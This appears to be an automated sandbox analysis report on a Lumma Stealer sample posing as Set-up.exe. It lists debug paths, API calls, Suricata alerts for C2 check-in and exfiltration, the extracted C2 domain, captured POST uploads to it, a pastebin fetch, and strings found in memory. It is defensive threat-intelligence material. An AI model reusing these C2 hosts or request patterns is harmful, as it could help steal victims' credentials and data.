Source:	Binary string: wntdll.pdb source: Set-up.exe, 00000003.00000002.1984108854.00000000042C4000.00000004.00000001.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.1982331918.0000000003BBC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.1983371696.0000000003F10000.00000004.00000800.00020000.00000000.sdmp, more.com, 00000006.00000002.2082451784.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, more.com, 00000006.00000002.2069602277.0000000004E7F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2089391977.000000000393A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb0 source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: dmprocessxmlfiltered.pdb source: more.com, 00000006.00000002.2086807895.00000000058A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Mark\code\github\NAudio\NAudio\obj\Release\net35\NAudio.pdbSHA256do source: powershell.exe, 00000000.00000002.1921287558.000001F944CAF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: f:\starburn\Bin\LIBCMT\Dynamic\Release\i386\StarBurn.pdb source: Set-up.exe, 00000003.00000002.1986917931.000000006F851000.00000020.00000001.01000000.0000000A.sdmp, Set-up.exe, 00000008.00000002.2095256022.000000006F851000.00000020.00000001.01000000.0000000A.sdmp

Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Code function: 3_2_6BB781A1 _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	3_2_6BB781A1
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Code function: 3_2_6BBAC8FD _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,	3_2_6BBAC8FD
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Code function: 3_2_6BBACC23 _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,	3_2_6BBACC23

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe

Code function: 4x nop then or byte ptr [edi], dh

3_2_6BB67270

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49737 -> 172.67.129.193:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 172.67.129.193:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49738 -> 172.67.129.193:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49736 -> 172.67.129.193:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 172.67.129.193:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49743 -> 172.67.129.193:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: marchhappen.cyou

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: rentry.co

Source: Joe Sandbox View

IP Address: 172.67.75.40 172.67.75.40

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 172.67.129.193:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 172.67.129.193:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 172.67.129.193:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 172.67.129.193:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 172.67.129.193:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 172.67.129.193:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 172.67.129.193:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 172.67.129.193:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49746 -> 172.67.75.40:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: marchhappen.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: marchhappen.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CNTWP1O0SXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18117Host: marchhappen.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=F6Z64DGUIPK91TNFCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8780Host: marchhappen.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VETBWDRWO0PAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20403Host: marchhappen.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6LWN9OV9M0DIVFRUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1237Host: marchhappen.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IFQ4S6910VJOCVBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 161189Host: marchhappen.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 84Host: marchhappen.cyou
Source: global traffic	HTTP traffic detected: GET /feouewe5/raw HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: rentry.co

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /feouewe5/raw HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: rentry.co

Source: Set-up.exe, 00000003.00000002.1986587085.000000006F009000.00000002.00000001.01000000.0000000C.sdmp

String found in binary or memory: nQLocalSocketPrivate::completeAsyncReadQLocalSocketPrivate::startAsyncReadQLocalSocket::waitForReadyRead WaitForSingleObject failed with error code %d.\\.\pipe\QLocalSocket::connectToServer%1: %2QLocalServerPrivate::addListener1_q_onNewConnection()QLocalServerPrivate::_q_onNewConnectione-islem.kktcmerkezbankasi.org2148*.EGO.GOV.TR2087MD5 Collisions Inc. (http://www.phreedom.org/md5)41UTN-USERFirst-Hardware72:03:21:05:c5:0c:08:57:3d:8e:a5:30:4e:fe:e8:b0Digisign Server ID - (Enrich)1276011370Digisign Server ID (Enrich)12000170511846442971184640175DigiNotar Public CA 20251e:7d:7a:53:3d:45:30:41:96:40:0f:71:48:1f:45:04DigiNotar Extended Validation CAd6:d0:29:77:f1:49:fd:1a:83:f2:b9:ea:94:8c:5c:b4DigiNotar PKIoverheid CA Organisatie - G220001983DigiNotar PKIoverheid CA Overheid en Bedrijven20015536120000515120000505DigiNotar Cyber CA1200005251184640176DigiNotar Qualified CA5b:d5:60:9c:64:17:68:cf:21:0e:35:fd:fb:05:ad:41CertiID Enterprise Certificate Authoritya4:b6:ce:e3:2e:d3:35:46:26:3c:b3:55:3a:a8:92:21DigiNotar Root CA G20a:82:bd:1e:14:4e:88:14:d7:5b:1a:55:27:be:bf:3eDigiNotar Services 1024 CA36:16:71:55:43:42:1b:9d:e6:cb:a3:64:41:df:24:38DigiNotar Services CAf1:4a:13:f4:87:2b:56:dc:39:df:84:ca:7a:a1:06:49DigiNotar Root CA0c:76:da:9c:91:0c:4e:2c:9e:fe:15:d0:58:93:3c:4c*.google.com05:e2:e6:a4:cd:09:ea:54:d6:65:b0:75:fe:22:a2:56global trusteed8:f3:5f:4e:b7:87:2b:2d:ab:06:92:e3:15:38:2f:b0login.live.comb0:b7:13:3e:d0:96:f9:b5:6f:ae:91:c8:74:bd:3a:c0addons.mozilla.org92:39:d5:34:8f:40:d1:69:5a:74:54:70:e1:f2:3f:43login.skype.come9:02:8b:95:78:e4:15:dc:1a:71:0a:2b:88:15:44:473e:75:ce:d4:6b:69:30:21:21:88:30:ae:86:a8:2a:7139:2a:43:4f:0e:07:df:1f:8a:a3:05:de:34:e0:c2:29login.yahoo.comd7:55:8f:da:f5:f1:10:5b:b2:13:28:2b:70:77:29:a3www.google.comf5:c8:6a:f3:61:62:f1:3a:64:f5:4f:6d:c9:58:7c:06mail.google.com04:7e:cb:e9:fc:a5:5f:7b:d0:9e:ae:36:e1:0c:ae:1eSTOULCNOStateOrProvinceNameOrganizationalUnitNameLocalityNameCountryNameCommonNameOrganizationQMap(-----END CERTIFICATE----- equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: marchhappen.cyou
Source: global traffic	DNS traffic detected: DNS query: rentry.co

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: marchhappen.cyou

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 24 Nov 2024 09:16:04 GMTContent-Type: text/html; charset=UTF-8Content-Length: 8771Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge

Source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://b.chenall.net/menu.lst
Source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://bug.reneelab.com
Source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://bug.reneelab.com/psw_report.phpLicenseCodePSW_RENEELB_WINx86_20201003User
Source: Set-up.exe, 00000003.00000002.1986587085.000000006F009000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://bugreports.qt-project.org/
Source: Set-up.exe, 00000003.00000002.1986587085.000000006F009000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://bugreports.qt-project.org/QHttpNetworkConnectionChannel::_q_receiveReply()
Source: Set-up.exe, 00000008.00000002.2088488029.0000000003744000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://c0rl.m%L
Source: Set-up.exe, 00000003.00000002.1981445677.0000000003AF6000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2079070422.0000000005222000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: Set-up.exe, 00000003.00000002.1981445677.0000000003AF6000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2079070422.0000000005222000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: Set-up.exe, 00000003.00000002.1981445677.0000000003AF6000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2079070422.0000000005222000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: powershell.exe, 00000000.00000002.1921287558.000001F944CAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1921287558.000001F9445BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Set-up.exe, 00000003.00000002.1981445677.0000000003AF6000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2079070422.0000000005222000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: powershell.exe, 00000000.00000002.1921287558.000001F9445BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: powershell.exe, 00000000.00000002.1921287558.000001F944CAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1921287558.000001F9445BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: powershell.exe, 00000000.00000002.1921287558.000001F944CAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1921287558.000001F9445BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: powershell.exe, 00000000.00000002.1921287558.000001F943B57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://contoso.com/rdweb/Feed/webfeed.aspx.
Source: powershell.exe, 00000000.00000002.1921287558.000001F9445BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: powershell.exe, 00000000.00000002.1921287558.000001F9445BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
Source: powershell.exe, 00000000.00000002.1921287558.000001F9445BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
Source: Set-up.exe, 00000003.00000002.1981445677.0000000003AF6000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2079070422.0000000005222000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: powershell.exe, 00000000.00000002.1921287558.000001F944CAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1921287558.000001F9445BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Set-up.exe, 00000003.00000002.1981445677.0000000003AF6000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2079070422.0000000005222000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Set-up.exe, 00000003.00000002.1981445677.0000000003AF6000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2079070422.0000000005222000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: powershell.exe, 00000000.00000002.1921287558.000001F944CAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1921287558.000001F9445BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: powershell.exe, 00000000.00000002.1921287558.000001F944CAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1921287558.000001F9445BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: powershell.exe, 00000000.00000002.1921287558.000001F9445BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Set-up.exe, 00000003.00000002.1981445677.0000000003AF6000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2079070422.0000000005222000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: Set-up.exe, 00000003.00000002.1981445677.0000000003AF6000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2079070422.0000000005222000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: Set-up.exe, 00000003.00000002.1981445677.0000000003AF6000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2079070422.0000000005222000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: Set-up.exe, 00000003.00000002.1981445677.0000000003AF6000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2079070422.0000000005222000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Set-up.exe, 00000003.00000002.1981445677.0000000003AF6000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2079070422.0000000005222000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: powershell.exe, 00000000.00000002.1921287558.000001F944CAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1921287558.000001F9445BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: powershell.exe, 00000000.00000002.1921287558.000001F9445BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: Set-up.exe, 00000003.00000002.1981445677.0000000003AF6000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2079070422.0000000005222000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: Set-up.exe, 00000003.00000002.1981445677.0000000003AF6000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2079070422.0000000005222000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://grub4dos.chenall.net/e/%u)
Source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://isecure-a.reneelab.com/webapi.php?code=
Source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://isecure.reneelab.com.cn/webapi.php?code=
Source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://isecure.reneelab.com.cn/webapi.php?code=http://isecure-a.reneelab.com/webapi.php?code=http://
Source: Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://isecure.reneelab.com/webapi.php?code=
Source: powershell.exe, 00000000.00000002.1921287558.000001F944CAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1921287558.000001F9445BB000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.1981077927.0000000003204000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2088488029.0000000003744000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000000.00000002.1921287558.000001F944CAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1921287558.000001F9445BB000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.1981445677.0000000003AF6000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2079070422.0000000005222000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
